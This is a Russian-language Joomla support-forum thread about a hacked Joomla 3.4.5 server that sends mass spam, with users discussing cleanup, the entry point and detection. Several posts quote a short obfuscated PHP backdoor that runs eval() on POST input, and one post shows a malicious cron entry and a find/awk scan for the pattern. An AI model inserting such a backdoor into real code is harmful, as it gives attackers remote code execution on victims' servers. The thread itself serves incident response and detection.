Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 15 Ответов
  • 2441 Просмотров
*

KyM

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
сайт на Joomla 3.4.5 взломан
« : 24.11.2015, 17:02:53 »
Здравствуйте уважаемые форумчане.
Обнаружил у себя недавно на сервере, где размещены несколько сайтов на Joomla 3.4.5 большой поток исходящей почты (примерно 65К писем в час) по одному и доменов. обездвижил домен, затем полез в исходники и обнаружил там порядка 35 кусков кода в новых файлах и файлах движка следующего вида:

<?php $fix19="ts_po" ;$ayb33=strtoupper($fix19[2]. $fix19[3] .$fix19[4].$fix19[1]. $fix19[0]) ;if ( isset ( ${ $ayb33 }['q5bb481'])){ eval( ${$ayb33}['q5bb481' ]) ;}?>

Во всех обнаруженных файлах переменные соответственно разные.

После зачистки подобного рода кода, через пару дней ситуация повторяется, внердяется подобный код в модули/компоненты/плагины/библиотеки и пр., но спам при этом не идет и после установки плагина easycalcchek файлы админки злоумышленником не повреждаются и не изменяются. Отсюда делаю вывод, что хакер использует одну из уязвимостей из установленных в системе расширений, либо иной бэкдор.

Вопросы, собственно, следующие:
Какя методология определения наличия бэкдора?
Возможно ли в БД сделать подобную "закладку"?

PS Пароли для БД, админки и FTP после зачистки менял.
PPS Удалил JCE перед зачисткой как возможную уязвимость
PPPS После удаления найденных левых файлов поверх имеющихся накатил файлы Joomla с офф. сайта


« Последнее редактирование: 24.11.2015, 17:17:16 от KyM »
*

voland

  • Легенда
  • 11031
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Joomla 3.4.5 взломана
« Ответ #1 : 24.11.2015, 17:11:50 »
Вот понаставят всякой ерунды, а в заголовке движок обвиняют!
*

KyM

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Joomla 3.4.5 взломана
« Ответ #2 : 24.11.2015, 17:15:54 »
К движку претензий не имею, просто хочу разобраться где уязвимость или как её отловить.
*

voland

  • Легенда
  • 11031
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: сайт на Joomla 3.4.5 взломан
« Ответ #3 : 24.11.2015, 17:21:53 »
А я не вижу ни списка расширений, ни наличия вареза, ни когда обновлялись, ни откуда качалось..
Отсюда надо начинать разбираться
*

KyM

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: сайт на Joomla 3.4.5 взломан
« Ответ #4 : 24.11.2015, 17:27:47 »
Попробую дать более подробную инфу. Расширения, вроде те, что из левых:
JCE (уже удален)
Fox Contact 3.4.3
mod_playlistck (этот вроде с офф сайта)

К сожалению, откуда качалось остальное, сказать не могу, просто не знаю.

Сам движок обновлен 20-го ноября 2015г.
« Последнее редактирование: 24.11.2015, 17:36:42 от KyM »
*

jlend

  • Осваиваюсь на форуме
  • 34
  • 3 / 0
Re: сайт на Joomla 3.4.5 взломан
« Ответ #5 : 24.11.2015, 17:47:11 »
Сам движок обновлен 20-го ноября 2015г.


Это и есть ваша первая проблема в 3.4.5 закрыты очень большие уязвимости прошлых версий, вам надо было обновиться с выходом патча сразу как минимум еще месяц назад.

Какя методология определения наличия бэкдора?

Чтение и анализ логов на сервере.
*

KyM

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: сайт на Joomla 3.4.5 взломан
« Ответ #6 : 24.11.2015, 17:52:36 »
После обновления (20-го) исходники были опять изменены + добавлены собственные файлы (24-го, хакером), всё впринципе вычистил, но затрудняюсь в поиске самого бэкдора.
Подскажите, плз, методологию анализа базы данных и исходников с целью поиска бэкдора.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: сайт на Joomla 3.4.5 взломан
« Ответ #7 : 24.11.2015, 18:14:12 »
Если вас взломали сайт надо сначала чистить и потом только обновлять.
Если сайт не один то смотреть надо все сайты.
*

KyM

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: сайт на Joomla 3.4.5 взломан
« Ответ #8 : 24.11.2015, 18:20:28 »
обновлял после чистки, но есть подозрение, что взломщик оставил закладку в базе данных (например обращение к какому-нибудь зараженному png и т.п.)

посмотрел по логам, кто-то постоянно долбится к модулю mod_speedup, который я удалил (косяк, не забэкапил) при первой чистке, но при том, что этот модуль был удален, фронт был заражен повторно :(
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: сайт на Joomla 3.4.5 взломан
« Ответ #9 : 24.11.2015, 19:25:58 »
обновлял после чистки, но есть подозрение, что взломщик оставил закладку в базе данных (например обращение к какому-нибудь зараженному png и т.п.)
Значит не до чистили, чистите все по новой. Обычная ошибка тех кто впервой делает чистку. Пропустили shell или код подключения для заливки.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: сайт на Joomla 3.4.5 взломан
« Ответ #10 : 25.11.2015, 00:28:39 »
на счет БД, ищите код который инклудит JS, в нем могут быть прописаны скрипты которые при авторизованом действие могут вписать код в файл, к примеру тот же бегдор....
*

KyM

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: сайт на Joomla 3.4.5 взломан
« Ответ #11 : 25.11.2015, 13:39:43 »
В общем, кому интересно, вроде, нашел через что залезли.

Через уязвимость com_contenthistory, подобными запросами (кусок лога запросов под спойлером):
Спойлер
[свернуть]

mod_speedup содежит в себе бэкдор, с помощью которого закидываются прочие файлы (штук 35-40)
Спойлер
[свернуть]
*

zikkuratvk

  • Глобальный модератор
  • 4818
  • 344 / 2
  • Обслуживаем проекты - дорого.
Re: сайт на Joomla 3.4.5 взломан
« Ответ #12 : 25.11.2015, 14:16:42 »
Ну собственно вот вам и ответ... ломанули вас через бэкдор, который был исправлен в 3.4.5. А повторные взломы были уже через бекдор...
Хочется уникальное расширение? ===>>>> JoomLine - Разрабатываем расширения под заказ.
Использую хостинг TimeWeb и Reg
*

Knyaz71

  • Осваиваюсь на форуме
  • 31
  • 4 / 0
Re: сайт на Joomla 3.4.5 взломан
« Ответ #13 : 04.12.2015, 03:01:40 »
Была такая же и подобная хрень ((( а точнее
- файлов 25 со строкой <?php $fix19="ts_po" ;$ayb33=strtoupper($fix19[2]. $fix19[3] .$fix19[4].$fix19[1]. $fix19[0]) ;if ( isset ( ${ $ayb33 }['q5bb481'])){ eval( ${$ayb33}['q5bb481' ]) ;}?>, но решил не заморачиваться с чисткой, а просто переустановил движок
- был найден shell в корне шаблона beez3
- запись в cron'е пользователя, с обращением к файлу в папке tmp сервера (который запускал лишние процессы в системе)

П.С.
Спасибо FastVPS!
Подсказали что рассылка ведётся из файла: /var/www/**user**/data/www/**site**/plugins/twofactorauth/files.php

Сказали провереть файлы. Как в итоге оказалось, в каждом была строка из первого примера!
root@server:# cd /
root@server:/# find /var/www/*/data/www/ -type f -name '*.php' -print0 | xargs -0r awk '/strtoupper.*eval/ {print FILENAME} {nextfile}'

Спойлер
[свернуть]

cron
/var/spool/cron/crontabs/**user**:*/15 * * * * /var/tmp/VfWoUbBnm >/dev/null 2>&1
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: сайт на Joomla 3.4.5 взломан
« Ответ #14 : 04.12.2015, 08:21:23 »
Была такая же и подобная хрень ((( а точнее
- файлов 25 со строкой <?php $fix19="ts_po" ;$ayb33=strtoupper($fix19[2]. $fix19[3] .$fix19[4].$fix19[1]. $fix19[0]) ;if ( isset ( ${ $ayb33 }['q5bb481'])){ eval( ${$ayb33}['q5bb481' ]) ;}?>, но решил не заморачиваться с чисткой, а просто переустановил движок
- был найден shell в корне шаблона beez3
- запись в cron'е пользователя, с обращением к файлу в папке tmp сервера (который запускал лишние процессы в системе)

П.С.
Спасибо FastVPS!
Подсказали что рассылка ведётся из файла: /var/www/**user**/data/www/**site**/plugins/twofactorauth/files.php

Сказали провереть файлы. Как в итоге оказалось, в каждом была строка из первого примера!
root@server:# cd /
root@server:/# find /var/www/*/data/www/ -type f -name '*.php' -print0 | xargs -0r awk '/strtoupper.*eval/ {print FILENAME} {nextfile}'

Спойлер
[свернуть]

cron
/var/spool/cron/crontabs/**user**:*/15 * * * * /var/tmp/VfWoUbBnm >/dev/null 2>&1
В крон cron могли попасть получив доступ к центральной панели, т.е как вариант протроянив вашь комп или получив доступ к почте, где многие юзеры остовляют свои логины:пассы
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: сайт на Joomla 3.4.5 взломан
« Ответ #15 : 04.12.2015, 11:59:30 »
В крон cron могли попасть получив доступ к центральной панели, т.е как вариант протроянив вашь комп или получив доступ к почте, где многие юзеры остовляют свои логины:пассы
и через хостера, как это распространено
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 4
Просмотров: 179
Последний ответ 26.03.2024, 18:51:10
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 926
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1102
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 1639
Последний ответ 05.11.2021, 21:47:31
от wishlight
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

Ответов: 5
Просмотров: 1366
Последний ответ 13.09.2021, 09:23:28
от Oleg+